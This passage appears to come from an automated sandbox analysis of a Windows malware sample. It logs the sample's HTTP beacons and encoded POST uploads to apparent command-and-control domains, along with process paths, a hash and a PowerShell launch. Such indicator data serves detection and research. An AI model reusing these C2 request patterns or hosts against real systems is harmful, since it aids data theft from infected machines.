LH1t=3aBvuDl1MypbwAy/SVED70wltg7x2C1g88t4wC0UZzh3ngfWKC+MaovbovVlRsnjl0yx1Zofp/K/zWC4qcD2+UFQEeDlWfq/UYlXYhEkfMYdlL71FbXrA4P6GZ8v4c62r9Jz7Js/w45AMnF6M4Q/J+nAkG1vST/Sti428zmQ5vG4HVrxVyN8z4AZcgetXpa4yqyXSV2x6X3AquNw7Y+37dbzgMXK
Jan 10, 2025 16:43:06.933271885 CET	407	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:43:06 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9a Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	50018	192.186.57.30	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:08.592808008 CET	1775	OUT	POST /i75c/ HTTP/1.1 Host: www.yxni.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Origin: http://www.yxni.vip Referer: http://www.yxni.vip/i75c/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 33 61 42 76 75 44 6c 31 4d 79 70 62 77 41 79 2f 53 56 45 44 37 30 77 6c 74 67 37 78 32 43 31 67 38 38 74 34 77 43 30 55 5a 7a 35 33 6d 53 48 57 4a 67 57 4d 62 6f 76 62 68 50 56 67 52 73 6d 68 6c 30 36 31 31 5a 6b 70 70 39 43 2f 38 56 4b 34 36 6f 66 32 72 6b 46 51 59 75 44 6f 59 2f 72 6e 55 59 31 54 59 68 30 6b 66 4d 59 64 6c 4b 4c 31 52 35 76 72 43 34 50 35 53 4a 38 6a 7a 38 36 53 72 39 42 4e 37 4a 6f 76 78 4c 68 41 50 48 56 36 4f 4e 4d 2f 56 75 6e 47 6c 47 31 33 53 54 7a 52 74 69 6b 51 38 7a 44 59 35 73 6d 34 58 54 79 46 51 7a 64 58 67 61 59 41 5a 69 57 59 66 4b 2f 64 30 4b 75 45 66 30 62 4c 31 79 6a 41 36 73 42 45 35 36 4b 2b 6d 37 66 47 74 62 76 46 6c 38 4e 6d 74 76 37 42 64 70 31 4c 37 5a 6f 62 63 65 43 6b 4d 31 6b 58 4b 58 53 75 38 6c 75 4f 39 6e 44 7a 42 6f 43 43 6e 43 62 4c 46 50 44 34 67 62 4c 58 2f 6b 31 55 31 61 4a 59 6e 66 52 47 5a 4d 4a 62 50 2f 48 50 51 44 67 36 48 71 59 64 4e 37 7a 4f 4b 6d 72 4a 6f 31 4e 39 31 62 5a 45 78 55 55 31 57 4c 71 33 52 51 48 71 6b 6a 46 4a 58 [TRUNCATED] Data Ascii: LH1t=3aBvuDl1MypbwAy/SVED70wltg7x2C1g88t4wC0UZz53mSHWJgWMbovbhPVgRsmhl0611Zkpp9C/8VK46of2rkFQYuDoY/rnUY1TYh0kfMYdlKL1R5vrC4P5SJ8jz86Sr9BN7JovxLhAPHV6ONM/VunGlG13STzRtikQ8zDY5sm4XTyFQzdXgaYAZiWYfK/d0KuEf0bL1yjA6sBE56K+m7fGtbvFl8Nmtv7Bdp1L7ZobceCkM1kXKXSu8luO9nDzBoCCnCbLFPD4gbLX/k1U1aJYnfRGZMJbP/HPQDg6HqYdN7zOKmrJo1N91bZExUU1WLq3RQHqkjFJX+oFzQJGvAuj+/z4j1g/WfVqUJP9w9Ra0QaA1j2jt2IZdcHSVp6+NBpEOyzTCTFDAq55/YuyZ28Dl1AF5rNa+D4os0yIZpNpwb1omQ0n0D87548UUCKUZSbQ/XqiOplEt26NOmA2hWBAHhw3DGjCmNu2WSv94GrM3hem0WyNFT72vtxm+cPJO24l+oiRKqbYpLCc9VCAKBnImfnEFWtisEaEyTR8jTs3PRYkykffQ08y9ooRc/2HLt25kSpnbI3SZXwDsPFTOgktsMwWzb403S1gGpCGW3Y4CZON7RYkbdZevMLiMwEciuGfrm8IxmG/Bt0GqO/FjgOLRz1+veB6FUJ646QzGuBN4Ny1/6M22jCH8e6BSifgaHFWYjkADntkcQbtB0NjqWhmseLMK1nzEdZiAf3FnI4nQXmegXlmJj2C6oJKFNJMcMq85VMVcNP9njjfG3V0UocBeDOQ8ArET99j3vxbnGk7v4ymy0cN8BSd47nqJYebfS+9rNVCla1vVliBPiqRk0tgQVxcQjMy9RP4yefY8njQH0BMpImpLo+Tpf2qBfJ9wNpFr2DxlvMdT/9K0/C3aGqRd3FUI6NHJDAeTelrsbfjRRDldzmIMRUf+4OiIA11Fr/yM1lf8i9LAsIqftVPptf6DgYKe8MYDr5Kua3EctkW6xb [TRUNCATED]
Jan 10, 2025 16:43:09.481182098 CET	407	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:43:08 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9a Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	50019	192.186.57.30	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:11.136811972 CET	497	OUT	GET /i75c/?LH1t=6YpPt3cONEAD+3jtLDhd/Wpx5gzl+zwI9O5U7w1gcS11pHuKcF79farrxfROfOqahE6dsqUHnv6H8Vej6onxvENfYcLjeeOZCJ5HSE9XR48AmqL+ar7nJpXGb6U4weXk0Q==&fpJ=16J40rx8bHP8SV HTTP/1.1 Host: www.yxni.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:43:11.989800930 CET	407	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:43:11 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9a Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	50020	84.32.84.32	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:17.082104921 CET	771	OUT	POST /vekd/ HTTP/1.1 Host: www.absseguridad.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 205 Origin: http://www.absseguridad.online Referer: http://www.absseguridad.online/vekd/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 31 38 63 58 6c 54 6e 41 32 46 49 69 36 49 74 55 37 69 50 57 31 42 41 53 39 72 73 53 56 71 69 70 47 56 34 4b 46 55 56 64 51 70 7a 69 4b 49 72 51 7a 57 55 6c 66 4e 6b 58 54 47 4c 41 5a 44 56 34 4a 42 5a 63 53 32 79 33 70 56 66 6b 67 78 2b 44 49 73 56 4e 77 73 69 2f 39 54 35 75 6f 6e 4a 49 56 62 4a 4f 68 4d 55 34 66 64 61 4b 75 4e 70 44 67 62 6e 5a 30 71 39 38 38 65 79 6b 65 76 33 4f 65 66 55 41 6c 38 53 65 52 64 55 57 6b 66 33 38 36 57 70 4f 62 33 6f 71 48 46 33 57 68 6d 66 64 45 65 74 4c 77 5a 36 2b 47 69 31 47 57 63 4c 43 6f 36 2f 54 6a 2f 71 63 65 31 50 71 78 47 72 66 77 53 43 6f 59 38 67 3d Data Ascii: LH1t=18cXlTnA2FIi6ItU7iPW1BAS9rsSVqipGV4KFUVdQpziKIrQzWUlfNkXTGLAZDV4JBZcS2y3pVfkgx+DIsVNwsi/9T5uonJIVbJOhMU4fdaKuNpDgbnZ0q988eykev3OefUAl8SeRdUWkf386WpOb3oqHF3WhmfdEetLwZ6+Gi1GWcLCo6/Tj/qce1PqxGrfwSCoY8g=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	50021	84.32.84.32	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:19.646878004 CET	791	OUT	POST /vekd/ HTTP/1.1 Host: www.absseguridad.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 225 Origin: http://www.absseguridad.online Referer: http://www.absseguridad.online/vekd/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 31 38 63 58 6c 54 6e 41 32 46 49 69 37 74 39 55 72 78 6e 57 69 78 41 52 68 37 73 53 4d 36 6a 69 47 56 30 4b 46 51 45 57 54 62 58 69 4b 73 37 51 79 58 55 6c 65 4e 6b 58 63 6d 4c 4a 45 7a 56 76 4a 42 55 32 53 7a 4b 33 70 57 6a 6b 67 78 4f 44 49 66 4e 4d 78 38 69 78 32 7a 35 6f 31 58 4a 49 56 62 4a 4f 68 4e 30 57 66 65 71 4b 74 39 35 44 68 36 6e 61 33 71 39 37 32 2b 79 6b 61 76 33 53 65 66 56 74 6c 2b 6d 6b 52 62 59 57 6b 62 7a 38 37 45 52 52 52 33 6f 73 44 46 32 42 6c 6c 6d 4f 4d 65 5a 36 32 37 69 6b 42 78 31 47 58 71 36 6f 79 59 33 56 67 2f 43 33 65 32 6e 63 30 78 32 33 71 78 53 59 47 72 30 4a 49 43 44 4c 63 4e 4b 64 6a 67 30 48 4a 38 7a 37 43 62 77 62 Data Ascii: LH1t=18cXlTnA2FIi7t9UrxnWixARh7sSM6jiGV0KFQEWTbXiKs7QyXUleNkXcmLJEzVvJBU2SzK3pWjkgxODIfNMx8ix2z5o1XJIVbJOhN0WfeqKt95Dh6na3q972+ykav3SefVtl+mkRbYWkbz87ERRR3osDF2BllmOMeZ627ikBx1GXq6oyY3Vg/C3e2nc0x23qxSYGr0JICDLcNKdjg0HJ8z7Cbwb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	50022	84.32.84.32	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:22.305792093 CET	1808	OUT	POST /vekd/ HTTP/1.1 Host: www.absseguridad.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Origin: http://www.absseguridad.online Referer: http://www.absseguridad.online/vekd/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 31 38 63 58 6c 54 6e 41 32 46 49 69 37 74 39 55 72 78 6e 57 69 78 41 52 68 37 73 53 4d 36 6a 69 47 56 30 4b 46 51 45 57 54 62 66 69 4b 37 54 51 7a 30 38 6c 4d 64 6b 58 43 57 4c 4d 45 7a 56 75 4a 42 4d 74 53 7a 32 42 70 51 6e 6b 6d 6a 47 44 4f 75 4e 4d 6f 73 69 78 35 54 35 74 6f 6e 49 56 56 62 5a 4b 68 4e 45 57 66 65 71 4b 74 34 39 44 6d 72 6e 61 78 71 39 38 38 65 79 67 65 76 33 75 65 66 4d 59 6c 2b 6a 54 53 72 34 57 71 66 58 38 35 78 46 52 5a 33 6f 75 47 46 32 4a 6c 6b 62 57 4d 66 31 2b 32 36 57 61 42 78 39 47 56 75 6e 6a 69 70 72 78 32 63 7a 45 63 6c 76 4a 7a 47 36 47 6e 6e 57 4e 44 70 73 64 45 57 58 55 53 66 79 49 75 44 74 6c 55 74 4c 6a 46 65 5a 78 6d 46 4c 57 54 69 2f 35 38 37 38 69 42 77 43 73 6b 69 79 77 56 39 6b 46 5a 6a 6e 41 52 66 4c 72 39 30 79 56 65 33 71 4b 66 41 62 53 67 6f 7a 52 4e 78 4c 53 78 4c 34 73 4e 37 31 43 4f 56 56 6e 70 45 39 53 72 4c 78 74 32 74 38 35 2b 42 41 59 70 65 32 57 54 42 73 33 62 46 73 2b 35 6d 46 66 35 67 55 42 2f 68 55 6b 6d 47 42 6e 4c 5a 5a 30 72 [TRUNCATED] Data Ascii: LH1t=18cXlTnA2FIi7t9UrxnWixARh7sSM6jiGV0KFQEWTbfiK7TQz08lMdkXCWLMEzVuJBMtSz2BpQnkmjGDOuNMosix5T5tonIVVbZKhNEWfeqKt49Dmrnaxq988eygev3uefMYl+jTSr4WqfX85xFRZ3ouGF2JlkbWMf1+26WaBx9GVunjiprx2czEclvJzG6GnnWNDpsdEWXUSfyIuDtlUtLjFeZxmFLWTi/5878iBwCskiywV9kFZjnARfLr90yVe3qKfAbSgozRNxLSxL4sN71COVVnpE9SrLxt2t85+BAYpe2WTBs3bFs+5mFf5gUB/hUkmGBnLZZ0rAqK2lV3FLjyBhhy3B5us7RAfIkLm91L/Cgt9TBDG+fMTaXz/KRBuYJqbHSD4cIqcvjnOcVvzPnis9ZWtTYeut4gd9VZ7/a8IpjltzNB6InoAHdzaXSghIUj4dFQy3db/MKXtA2ktTscO4ygOnBfXZ/0iL+YI9t13HzrudwkljRnFgnk76abpfdYXy2LM014pG1eOUbpRDXTbPa4O8sbq+SKDHVJusOjoLGGcV4TrDdYqlD61jpZx77G2Tf6Cjf7VXAU7IkDIrIZmkrNPZWlrwPhJgu/A6l1ZsLVISngj5K8Bamo2FZJVPaPiMyk9yFr5ee3yo3LZYX8b4GfG8X31tX/zx1WN6oVyWke6uR/rNjkNZvPVVsZogIizIVBACOaO00ar6yxDb7x37+DIbt2cYcPbi6prbG9TKbowmlt8ig8gBBiaC2cH46hcKoidpND8wdhd6YbBcnadS60J/25M0WnKufj0T8xIRol3jEtDy576IfpCzeAoWOhKeBuM/Pho+F5mS1TZdy8CoWQzUSFDx4/zw4t4XkKV408VX4MfkyYYVOjo7LrvZu+3qkdv+DFY8yZ8XzVtqpO3uE4IDw02qxB/vFx5n34L9rxeQAmSb9/Yfr4r2W09/IW6gKfmJsRn7Wcj5iMQxWU6A2Drumkju0Ht4yhApXseQW [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.8	50023	84.32.84.32	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:25.414829969 CET	508	OUT	GET /vekd/?LH1t=4+03mnWHwBpjxbZK83upzCssoIYTYaC0AmwhJXtUcJzMctKA4SYWH8wIDV3ifRB0BjdWYS+2+kfE7i2zAqwY4crugBFAl0R3da1ul9ErZ5iShpdYh6TP2qhh9v/Ob9yjcQ==&fpJ=16J40rx8bHP8SV HTTP/1.1 Host: www.absseguridad.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:43:25.862735033 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:43:25 GMT Content-Type: text/html Content-Length: 9973 Connection: close Vary: Accept-Encoding Server: hcdn alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 1162d6127288f8cd1ee2e72d8fdbdccf-bos-edge1 Expires: Fri, 10 Jan 2025 15:43:24 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
Jan 10, 2025 16:43:25.862763882 CET	1236	IN	Data Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
Jan 10, 2025 16:43:25.862776041 CET	1236	IN	Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
Jan 10, 2025 16:43:25.862829924 CET	672	IN	Data Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
Jan 10, 2025 16:43:25.862839937 CET	1236	IN	Data Raw: 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 69 Data Ascii: ync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer\|\|[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32p
Jan 10, 2025 16:43:25.862853050 CET	1236	IN	Data Raw: 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 Data Ascii: -account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger na
Jan 10, 2025 16:43:25.862864017 CET	1236	IN	Data Raw: 66 6f 6c 6c 6f 77 3e 41 64 64 20 61 20 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 Data Ascii: follow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your
Jan 10, 2025 16:43:25.862874031 CET	1236	IN	Data Raw: 2b 33 38 29 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67 Data Ascii: +38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal i
Jan 10, 2025 16:43:25.862884998 CET	988	IN	Data Raw: 28 6d 2d 3d 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b Data Ascii: (m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if

Target ID:	0
Start time:	10:39:17
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\zE1VxVoZ3W.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\zE1VxVoZ3W.exe"
Imagebase:	0xf90000
File size:	1'010'176 bytes
MD5 hash:	3AF13FB92C445D73E1CE763D1400D39C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:39:18
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
